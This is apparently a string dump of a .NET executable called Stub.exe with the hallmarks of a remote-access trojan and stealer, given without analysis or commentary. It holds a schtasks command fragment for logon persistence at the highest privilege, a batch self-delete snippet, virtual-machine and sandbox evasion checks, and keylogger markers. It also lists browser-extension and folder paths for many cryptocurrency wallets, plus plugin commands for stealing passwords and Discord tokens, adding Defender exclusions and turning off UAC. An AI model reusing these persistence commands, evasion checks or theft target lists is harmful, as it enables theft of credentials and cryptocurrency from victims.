!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
Action`10
<Read>b__0
<Read>b__2_1
IEnumerable`1
CallSite`1
List`1
Microsoft.Win32
user32
ToUInt32
ReadInt32
ToInt32
X509Certificate2
ToUInt64
ToInt64
ToUInt16
ToInt16
HMACSHA256
get_UTF8
<Module>
QrxvDKuHLcnvHA
UdNWrThziPA
iPhPJeYSNkSA
tnXQlEeohHBfVA
dMjPEIwwqgsVA
CqGamSCNgeYA
oTSrlwAmjcA
CrrzQoAWTJdA
SystemParametersInfoA
gNYbcfNQUpoA
cTHlZAzWeJpJzTB
GiaMZCyjcB
FMwWVPUADHvrB
yMMDHibdFkXHC
soRrFYcvykZVC
IKSERXgyAWC
ZSeofMUeQlC
JBVWuFxIMcqC
sDEWcSkoaBHGyC
argrmjPObzzC
aXOPsOipOrCD
MapNameToOID
get_FormatID
MVfSKSXdNPnSOD
hHeKVeKtSD
JjPtOQtkuZVD
JJrOododguUlD
hlrfCQIkYPfmD
NSBhiSWxInuD
yVbYKepcNGDaGE
YVtPoOjtzPrGE
nCxrPKYbwXE
otANpJxmiJcE
xqtsVCumTcE
OuSAkRZLOnfE
NRJKqnKLShE
cFyLZBzUnE
yXhNLPhcGzE
WRzkUfOWhKEQAF
xkIOeawnzIFqIF
wOFRTBkXcQF
uoIGRaZDUKwTYPvF
IykNiRhbXFrBG
WVbhfGgmJzDG
czslwlksGDGG
EaLyecyzJOG
TYQOmeTEPG
vomWCCnFZqxPQWG
yxKYTaUlxWG
xgLvbJuSNHOYFRZG
DYXUmvAWTaG
fSPQfxCjbG
YcDKBsoCbIcG
KbJzwylAMjxfhG
rIeVfuSphG
XblBaEwzcGfzRjG
AckQzxDGaoDsG
FsjsFykMgEltCH
wJWjWGaNYBHmDH
xtTblEnQdIH
kZTrWiESyFFSqmJH
wkphzmiZeWOTLFYdKH
FmBAihHNaNOOMH
eSROvvhLmzcMSH
sUxBEYshcqH
gEydPqiwotH
OuxstKXXnpsGI
get_ASCII
tjfeFaTGYsJcI
PTgkuVwRerrI
YFJdTNdnNHDJ
UuoZppMATSJKRJ
XgkUTvGiMCuVJ
SXDeVtCNFtOzoJ
BVgofCKRgksJ
gZUXQxxDiEK
LWzUKtKKraIK
IjLGBcUDWrpGKK
ggcQjDrmQmStNK
TJMBCmpMBZPK
fKMubMyQWwMWoTK
BvcWgxRkPXUK
BkIEdralaK
ZqTrXrJkYxZcK
vHHNQXckKfK
KBdUQhuRITgK
EHcMGQYqcuVcmK
TpOjdDtStypK
BVwJrwcQambxdzK
fHDmTiimKL
gbHXJRljgDAEwmbML
uScvpCpwnPTL
hzuRPrwfvgL
tjwAaoPdGXAPiL
AjXBibKPutwL
GBDotujOWjQM
fPtMHVGbPmRM
ShsSzHNZuBuAOKxYM
QhwrkIMfhcM
FbZFmTiRAbgM
zeUVfOnQlxMAkM
azrlVLrBGwsjuM
jiLdJPgrtFRFN
ibrNpGNNkKHN
dbMEIFQNFOybIN
NiqUsECdIpMN
omrbaCpJsuNN
DSmQxZnDxcmYN
anYbqSCCIbN
XVHWivftizQhsN
aWHKkAeiPWxuGwN
QaDuiROzTjzN
JzWfdlOzLAO
System.IO
NDHuUmMAaXBLO
IBbNsgLnfXOCTuO
FThukYOlUBvO
ETmpRqRoRmKvO
OgthjGqddRzO
fsYPiPGbDKBP
uDbpRQZmkoGP
bOdZHyshKPIHP
QQSRQTJBvNP
jeHcCOZcxmKPSP
gzMwQcnrhBqPMZP
lvazFjjnAhFrCbP
QjnBdxDWFtAeP
xxOvuLxUDuP
xjvsMVAQGroFQ
iDQcJVSvNtoVHQ
kkFcVnovnTQ
belSTEbtUQ
mWHqTWstUQ
PLAsyBhBknWQ
XylaREQlEmqYQ
CdnkRxjXldaQ
hrqjzINNXzaQ
kGhZmEHyZJjbQ
AaZNPFkaydvSYNiQ
QoTkdqiwmTKvlQ
IOrDdjSWvwHuQ
PTLltgcyrAbxoAUR
jgsxCubJigzqWR
gNAxlHhUcYeR
TgxdNZWCmBZYvFhR
LIUYfJrvkAnR
KcJOkyGGmKFiLS
KdUoORCoWS
NuhqDyLcDeYlcS
eQUmCjSIiS
BjqnvFWXlmS
yrLgeJXjtS
JMUvVqTMnBT
JVSIvWEhhtGT
xvfIJlAPvFQIHT
GpiJrJsSpHT
LrHpMUctklNvT
NCeRszSJdQBU
JvdnlEzoXyBU
FRpwbIcBAIU
WdKaXjJUqbIyLJU
RAbyVdRLMU
ZnJsczSjiZU
GgqLKYzKMeU
rtujPkxPmtlpU
GMCmeNnLzoFV
get_IV
set_IV
GenerateIV
hXSklDcVzDJV
qYzKkKoWIWBQV
xqLIMNIiVV
TvKFIuFnmGxXV
MhHoAoZMTYV
FMgLaOTWYZV
LdVBZjdfKboV
RAevxhsnAOcoV
bAkxvxoUwIsV
ZLwxnoHzRgpxyV
hbqWhyCJEuFW
QseaFdoPrHW
oURGaAPQbYRW
SgLomqqkrXW
BezEojKsxxVcW
ZFvKnOPUDKJceW
EAHrYQlMGCArdeW
hKKDUCkiRlmVreW
UjRnLuvJAcXkW
fHtojOfMRmXuW
oJcWTgBixW
DTElsLhBDZFHX
vOnTaUpGxsfXIX
CDtuFwZqctZRX
RmnbVtuOmvRX
TiJOdFFDLqZX
WtjwUHEZVAXsuX
ODrkQhveaDKZszX
SonZylwifAgcHY
cScqpovLxKkZUNY
iuOLFfOhZOY
EIwaJroTVURY
HbomvGOMeparRZ
gkzmYjNgjPTZ
GievXSFKWZ
EwPcYWggHVTDaZ
AbTWvasDKDcZ
HXJlLLnWWfZ
agDFsscbFEPhZ
swHdcdSCWiZ
wqfhpBIztZ
nXkWqtyAGHfxZ
value__
qPsBrzofxXVPFa
qzErXKiACGa
eCzAxkfvjqMa
VjhSpUJYDYPa
HXdNHtWopxea
tMspROwhicKTla
vygcMSirHpa
vsckpaBXWwa
fmjVXIaWzBb
LAJQzTdYnJeiSb
lhjeiXKLSLTb
wvxnPzeiYhXb
gZDkkdEPytHZb
ZnayjxSiNpoxDgb
mscorlib
IrhjBcEDHPhlb
dCLymPbfHLpb
yjAworAxTsb
hDRrwHGSxAc
rQqEZrzoTBc
QVgvFmuinBc
oZkEPjZfYSbECc
KosDdkisnTTDc
GUdEjnfWOWeeGc
VgnJgOGoYxNc
LETPGtTjdQc
JGMqYqLWhTyRLgVc
pZGrsmmKYc
HJnSruWOzdSac
System.Collections.Generic
Microsoft.VisualBasic
AZfloTSQVmc
get_SendSync
bxtIULoxqkdvc
GetWindowThreadProcessId
GetProcessById
GHUygTqKeAjPLd
nbxorzhvJTthBouRd
RmtlJAsEncXd
EndRead
BeginRead
Thread
SHA256Managed
jTpznXiPred
get_Connected
get_IsConnected
set_IsConnected
get_Guid
olfrbKjMebYBLmXld
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
gWtokWiwWsld
Append
RegistryValueKind
CompareMethod
method
Clipboard
ffdjrlnGtkud
nWjmNjEmzd
RQuSgRWPwBCe
jYnWcXLaocFe
SRmThoDBYrGe
qwACWsCIrWIOwLIe
HxACNSwWDXCVLJe
kznbuBazoFsxJe
mmpGAARMMMMe
RCoqyhEUUdRe
AJVPLMvdXgiwTe
jVLLsVcGouaae
Replace
IsNullOrWhiteSpace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
DeleteSubKeyTree
get_Message
EndInvoke
BeginInvoke
GetEnvironmentVariable
IEnumerable
IDisposable
ToDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
ToSingle
DownloadFile
IsInRole
WindowsBuiltInRole
get_MainWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
get_MachineName
get_OSFullName
get_FullName
get_UserName
get_ProcessName
CheckHostName
DateTime
eYoKNIPzuMTHGne
zmEhATKinnGne
VuekvhqPgne
WriteLine
get_NewLine
Combine
UriHostNameType
get_ValueType
ProtocolType
GetType
SocketType
FileShare
System.Core
MethodBase
Dispose
StrReverse
X509Certificate
Create
MulticastDelegate
GetKeyboardState
SetThreadExecutionState
SetApartmentState
GetKeyState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
ViKYOFOGiGQQCf
BLoqpobVWqRDf
GKpnIUaHldLf
SizeOf
aIjGQbrrWf
CFDEyiRvbSnmef
RIIgQrxOYOvKYhf
GkZDNSuVjf
wBmubDRxkPamf
JwsSSYEbJgsmf
OuqsdTUJeFdcNmqf
oCRBvdCkSjrf
vDYQYQlfjsXCg
PSUyOwdskSQDg
ERbIbXDCoPZXdPg
OBySBMwHEWCVg
gagagggagagag
asGnqXnNdZhlVdg
uFFzkMNdEvahg
ZfcQHuDUviRXfig
CryptoConfig
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
UTF8Encoding
System.Drawing.Imaging
System.Runtime.Versioning
FromBase64String
ToBase64String
DownloadString
ToString
get_AsString
set_AsString
GetString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
BlrrrdboMZcChBog
set_ErrorDialog
dHsbVvzBCpg
hDRERKlCJGCEh
habbqyaAfrWfYJLJh
UgEIWgRaOIiTXjMPh
AdeobeoBUrXQh
ZmVJSiQEzZh
JwsILkIAgyoh
ComputeHash
VerifyHash
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
EndsWith
domDircVeVwh
rSXqmOHpaWwh
TpIfiQkMysxh
plBzQDytsBJLi
GsKyHkgLaxPi
pQOKmMshkHTi
yzEmmqjIRQNkVVi
zuxDoHbcoNBj
jpfFePYKDj
WvbJBFCLpIfjWMj
wmNRRXANvXTj
IAYxoFsxZqTj
MOExqDtzEkWWj
YziYMJnfMYYj
XIwAJXuLNej
QYEbmdufYkjj
zimdaaDtGilj
ESDUQPeEeUnj
PvxoYCizqj
XvVTQYiTofrj
anwBvilwiBkasj
YHGXKJzhzCqkPsGk
VYENZtxpJiBXKVk
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
callback
RegistryKeyPermissionCheck
FlushFinalBlock
wgprdkciUboCyck
oSZkEyMutk
YqRJZSGsvk
EFFSphLOQKl
lVnFTDVsHnAPl
LFDVhPWcGrXl
RtlSetProcessIsCritical
Marshal
NetworkCredential
System.Security.Principal
WindowsPrincipal
get_Interval
set_Interval
LMRnWFYJiTWhl
tAIchDpchl
qChmBGvoDPwil
kernel32.dll
user32.dll
ntdll.dll
YlVsKWHOaMOql
ZxcAqwXecsl
PgUuRPJSDyGmxl
AKwfNFnibSDcGm
zJOaddQIHzjJm
UZomfOsWgsOm
jnjJhYHrzFXm
FileStream
NetworkStream
SslStream
CryptoStream
GZipStream
MemoryStream
lParam
wParam
get_Item
get_Is64BitOperatingSystem
AoENexzBNBqegm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
AgJzCPCSUrkm
Random
ICryptoTransform
ArTCKSvFsBdmLYdBn
AUcZEFEcNaVVZOn
ToBoolean
TimeSpan
lzmTLqHLEen
wGyrERbwhn
X509Chain
AppDomain
get_CurrentDomain
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
CryptographicException
ArgumentNullException
ArgumentException
pqVDdZqrrgsn
MCCLlPyJbMOBYmGyn
DYlCiiCILwrRZUzn
bwTfkeYnJnNAJo
jQMTVXUdCjhNbo
ImageCodecInfo
MethodInfo
FileInfo
DriveInfo
FileSystemInfo
MemberInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
GetLastInputInfo
DLlZISxFfso
LBEZRUrzclXQYrPvo
xYtYlQiGWhdnNwo
oskgFfeBVGGxo
CnYXSxDHtqAp
kxlMClfHRoCsGp
UuCwFpZOBVLLp
TKqLrsrYep
TcRTpylUOkDvhNhp
ankxZouwCcjp
Microsoft.CSharp
vQbblnyQhkCsp
qdqMUYMYNfNTdCq
opSrBYMXsoNEq
HTcmODIFGqXgNq
AtKomidSIWXq
System.Linq
hTlxdaozoq
IJLJzwFkwwSwBr
rHQIwXehngOhDr
wqOwqDXokNwmaGr
wNhFhknGQxxwoMr
vhdArAKrYUPer
jhTlRjfWstXJSer
InvokeMember
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
SpecialFolder
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
get_Buffer
set_Buffer
get_AsInteger
set_AsInteger
ManagementObjectSearcher
SessionEndingEventHandler
ToUpper
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
oTFqZXdiYLfukr
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
NtqljyZPqlqr
IntPtr
vUCTjqjyNJFs
adhroHOhGs
vbQfQKEfWVrhmTHs
kbXWrWLEhIs
PrfSuKihtfPs
pdCeMCbCRaVs
AholEYBzBas
System.Diagnostics
SmjJtLxJEscs
FromSeconds
GetMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
GetDirectories
ExpandEnvironmentVariables
MZOwcEiWjIkjepes
GetTypes
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Rfc2898DeriveBytes
ReadAllBytes
GetBytes
BindingFlags
CSharpArgumentInfoFlags
CSharpBinderFlags
Strings
SessionEndingEventArgs
WHgCPzyvuyjs
ICredentials
set_Credentials
Equals
SslProtocols
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
qtsxiasYrns
wplaWhnrZrXXTDQqs
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
FileAccess
GetCurrentProcess
IPAddress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
gfolTTuBWus
RVOFqKtrODt
WbepMDVPEt
IVQsywFVXIt
oaFIKzajdJrLt
ZkzorHvaijPgUt
mveYVhCNrUt
RECIEPRrhtcDoXt
Concat
ImageFormat
get_AsFloat
set_AsFloat
ManagementBaseObject
object
Collect
Connect
System.Net
Target
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
op_Explicit
IAsyncResult
result
ToUpperInvariant
WebClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
get_RemoteEndPoint
get_Count
get_TickCount
get_ProcessorCount
GetPathRoot
ParameterizedThreadStart
Convert
FailFast
ToList
GetKeyboardLayout
System.Collections.IEnumerator.MoveNext
System.Text
ReadAllText
GetText
SetText
GetWindowText
tSMJfFJIxNu
yNNTOpnfdOisbu
SFNxVdGmBZgBAku
dCVXCdNAQmu
VHtgNFNAYPUtu
VTeKxtBCkvu
WPMCwgJVOBv
tTvqcgSURjYEv
cmRlAKOtGWtYGv
SJLguVckHv
NMtFfCfrDPv
NQnoVQxIQWv
CNjbyFuKPtXv
CvbIRZRPTkgv
HecUFxAepkv
ylgePqSGhEXSyxv
ZUDFNFdEuhzv
LNHjwFwvYsCRqAw
jekrvDNWnevZeCw
SctgCZZDfGw
CaSREvqJAtSrGfWw
kBTeqrMxdDkdYw
yXUOmxFhZwBPJgw
JgilUtSXhQvBUmw
GetForegroundWindow
set_CreateNoWindow
KLvcfkszuw
zgKJyUTnlnww
mMPzyynQihBx
ToUnicodeEx
UnhookWindowsHookEx
SetWindowsHookEx
CallNextHookEx
KcyldfHpsHx
TTDGBiSrlBbx
lZEMphWqKnbx
JtWgLcRwvicwQcx
FmwnmNPClHkx
sbauPphpFOkx
dhvjnJWdnx
EApfObsGqXMpx
PYBPKJBCjptx
rJKGpLdRJQFy
VVztyuTrSy
ofVifTfrtXy
InitializeArray
ToArray
get_AsArray
get_Key
set_Key
CreateSubKey
OpenSubKey
get_PublicKey
MapVirtualKey
RegistryKey
System.Security.Cryptography
TPCjPjoPiy
rSiueqtsHky
Assembly
AddressFamily
BlockCopy
TflPvddXyoTvqy
ToBinary
get_SystemDirectory
Registry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
SsvDokvEkTIz
WxgHarLYKz
kGGWAgvkTZdOz
gyQiIvMNwSz
ySuINpZdgYnTz
FhIKxgZsllWdz
mdmoudnnJgz
DkyDAZbVIkz
DbuwhuQusgmkoz
bJovaoKeDWpHxz
WrapNonExceptionThrows
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
</application>
</compatibility>
<asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" >
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>
SHA256
w70q7iVCZUBLrH36j5S+u4zs3rMxS3z+dxF1Nb66k6pQIfe6u4zLj0oOwqpw3Yy7wwst9UMmnJYhEJZSwdN6PBNMOnBzjQaR5S0J3VrRc9ZdxW/fTJ9Q0OZ947SQc9j5
7exIUa8L0uPu23/NxcFsnH4CBd/ea8B3YdG0hJ7pkdGLvhPBSbAsfbz3H9Odi72EVIah7VyhXmDZljsh9NyHVg==
imJ/H4r5QuFnaeCZiwMO/avsvvxJ+sKZTo97OWlHWoWSs0umkbF4NfJa7gaaS8rMuhquU4sSpsuWLw6PUi6FMAEAD21OaSCoX8NgcSbdeEU=
jCVMI+7PFiW/9n76x+shPVhOzUqUXky1KZBSX2TXQKS3QhZ4z0FocqBcaJ+bdUAF9tzpIjT/lN10cH40GvKQFA==
%AppData%
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
Packet
Message
LastTime
/c schtasks /create /f /sc onlogon /rl highest /tn "
" /tr '"
"' & exit
\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
@echo off
timeout 3 > NUL
START "" "
" /f /q
Select * from Win32_ComputerSystem
Manufacturer
microsoft corporation
VIRTUAL
vmware
VirtualBox
SbieDll.dll
Err HWID
ClientInfo
Microsoft
Performance
Pastebin
Antivirus
Meta_Firefox
MetaFirefox
\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Chrome
MetaChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Meta_Brave
MetaBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Meta_Edge
MetaEdge
\Opera Software\Opera Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Stable\Local Extension Settings\djclckkglechooblngghdinmeemkbgci
Meta_Opera
MetaOpera
\Opera Software\Opera GX Stable\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
\Opera Software\Opera GX Stable\Local Extension Settings\chrome-extension://djclckkglechooblngghdinmeemkbgci
Meta_OperaGX
MetaOperaGX
\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Chrome
PhantomChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Phantom_Brave
PhantomBrave
\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Chrome
BinanceChrome
\Microsoft\Edge\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Binance_Edge
BinanceEdge
\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
TronLinkChrome
Exodus_Chrome
\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
BitKeep_Chrome
BitKeepChrome
\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Coinbase_Chrome
CoinbaseChrome
\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Ronin_Chrome
RoninChrome
\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Trust_Chrome
TrustChrome
\Google\Chrome\User Data\Default\Local Extension Settings\jkjgekcefbkpogohigkgooodolhdgcda
BitPay_Chrome
BitPayChrome
\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Chrome
F2aChrome
\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
F2a_Brave
F2aBrave
\Microsoft\Edge\User Data\Default\Local Extension Settings\ocglkepbibnalbgmbachknglpdipeoio
F2a_Edge
F2aEdge
\Ergo Wallet
Ergo_Wallet
ErgoWallet
\Ledger Live
Ledger_Live
LedgerLive
\atomic
Atomic
\Exodus
Exodus
\Electrum
Electrum
\Coinomi
Coinomi
\Binance
Binance
\Bitcoin
Bitcoin_Core
Bitcoin Core
BoolWallets
\Mozilla\Firefox\Profiles
-release
\extensions\webextension@metamask.io.xpi
Return
Escape
LControlKey
RControlKey
RShiftKey
LShiftKey
Capital
[SPACE]
[ENTER]
[CTRL]
[Shift]
[Back]
[CAPSLOCK: OFF]
[CAPSLOCK: ON]
\Log.tmp
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
Software\
plugin
savePlugin
gettxt
passload
DicordTokens
WebBrowserPass
anydesk
getscreen
WDExclusion
weburl
killps
ResetScale
KillProxy
backproxy
uacoff
Wallets
Chrome
sendPlugin
Hashes
AllInOne
Password
Tokens
AVRemoval.Class1
Reset Scale succeeded!
BackProxy.Class1
wallets
Plugin.Plugin
Msgpack
Received
masterKey can not be null or empty.
input can not be null.
Invalid message authentication code (MAC).
{0:D3}
{0:X2}
(never used) type $c1
(ext8,ext16,ex32) type $c7,$c8,$c9
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0